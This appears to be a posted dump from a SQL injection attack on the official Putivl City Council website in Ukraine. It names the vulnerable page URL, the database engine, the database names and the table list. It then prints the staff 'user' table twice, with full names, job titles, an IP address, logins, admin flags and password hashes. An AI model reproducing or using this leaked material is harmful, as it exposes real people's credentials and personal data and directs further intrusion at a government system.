.gov government

.ua Ukraine

Putivl City Council - official site

http://putivl-rada.gov.ua/doc.php?cat=vybor2020

the back-end DBMS: MySQL >= 5.0.12

available databases [2]:
[+] information_schema
[+] putivlrada_gov

Database: putivlrada_gov
[29 tables]
+-----------------------+
| index                 |
| user                  |
| category              |
| files                 |
| log                   |
| news                  |
| ofinfo                |
| tabl                  |
| wp_commentmeta        |
| wp_comments           |
| wp_contact_form_7     |
| wp_links              |
| wp_ngg_album          |
| wp_ngg_gallery        |
| wp_ngg_pictures       |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
| wp_wpv_display_option |
| wp_wpv_file           |
| wp_wpv_file2tag       |
| wp_wpv_option         |
| wp_wpv_post2file      |
| wp_wpv_tag            |
+-----------------------+

Database: putivlrada_gov
Table: user
[8 entries]
+---------------+-------------------------------+------+------------------------------------+----------------------------------+-------------+--------------------------------------+---------+
| ip            | fio                           | id   | hash                               | pass                             | login       | posada                               | admin   |
+---------------+-------------------------------+------+------------------------------------+----------------------------------+-------------+--------------------------------------+---------+
| 80.91.189.118 | Черняков Сергій Михайлович    | 7    | 5102483c0019511531422d5d05a7e3b879 | b2f2c6b12f04a2eca202134b800e43ca | chernyakov  | Розробник                            | 1       |
| <blank>       | Єрмакова Ольга Володимирівна  | 8    | <blank>                            | b47cca4dead810c51de9d2340a07f122 | oly_sekret  | секретарка                           | 1       |
| <blank>       | tsdfsdfsdfsd                  | 9    | <blank>                            | 4217c31c195ed5ea40686544ada872c9 | test        | trolololoololo@mail.bg               | 0       |
| <blank>       | Литвинов Олександр Васильович | 10   | <blank>                            | 2fef859276bf43530cb3d69cffa064f2 | putivlrada2 | секретар ради                        | 1       |
| <blank>       | t3r53ntuh                     | 11   | <blank>                            | 806b1a1f9ee9e0e08639f54ccc4f7a30 | t3r53ntuh   | asw                                  | 0       |
| <blank>       | Черняков Сергій Михайлович    | 12   | <blank>                            | b2f2c6b12f04a2eca202134b800e43ca | USER        | USER_TEST                            | 0       |
| <blank>       | Шумний Валерій Анатолійович   | 13   | <blank>                            | ce0680cf8bda93f48655fff8ffaf35e5 | Valeri      | начальник відділу землевпорядкування | 1       |
| <blank>       | odnfojdnf fdfd fdfd           | 14   | <blank>                            | 1cba855ff1d95f818afb09e0a5ca2372 | pppq1       | fdnfdnfjn                            | 0       |
+---------------+-------------------------------+------+------------------------------------+----------------------------------+-------------+--------------------------------------+---------+

+-----------------------+

Database: putivlrada_gov
Table: user
[8 entries]
+---------------+-------------------------------+------+------------------------------------+----------------------------------+-------------+--------------------------------------+---------+
| ip            | fio                           | id   | hash                               | pass                             | login       | posada                               | admin   |
+---------------+-------------------------------+------+------------------------------------+----------------------------------+-------------+--------------------------------------+---------+
| 80.91.189.118 | Черняков Сергій Михайлович    | 7    | 5102483c0019511531422d5d05a7e3b879 | b2f2c6b12f04a2eca202134b800e43ca | chernyakov  | Розробник                            | 1       |
| <blank>       | Єрмакова Ольга Володимирівна  | 8    | <blank>                            | b47cca4dead810c51de9d2340a07f122 | oly_sekret  | секретарка                           | 1       |
| <blank>       | tsdfsdfsdfsd                  | 9    | <blank>                            | 4217c31c195ed5ea40686544ada872c9 | test        | trolololoololo@mail.bg               | 0       |
| <blank>       | Литвинов Олександр Васильович | 10   | <blank>                            | 2fef859276bf43530cb3d69cffa064f2 | putivlrada2 | секретар ради                        | 1       |
| <blank>       | t3r53ntuh                     | 11   | <blank>                            | 806b1a1f9ee9e0e08639f54ccc4f7a30 | t3r53ntuh   | asw                                  | 0       |
| <blank>       | Черняков Сергій Михайлович    | 12   | <blank>                            | b2f2c6b12f04a2eca202134b800e43ca | USER        | USER_TEST                            | 0       |
| <blank>       | Шумний Валерій Анатолійович   | 13   | <blank>                            | ce0680cf8bda93f48655fff8ffaf35e5 | Valeri      | начальник відділу землевпорядкування | 1       |
| <blank>       | odnfojdnf fdfd fdfd           | 14   | <blank>                            | 1cba855ff1d95f818afb09e0a5ca2372 | pppq1       | fdnfdnfjn                            | 0       |
+---------------+-------------------------------+------+------------------------------------+----------------------------------+-------------+--------------------------------------+---------+
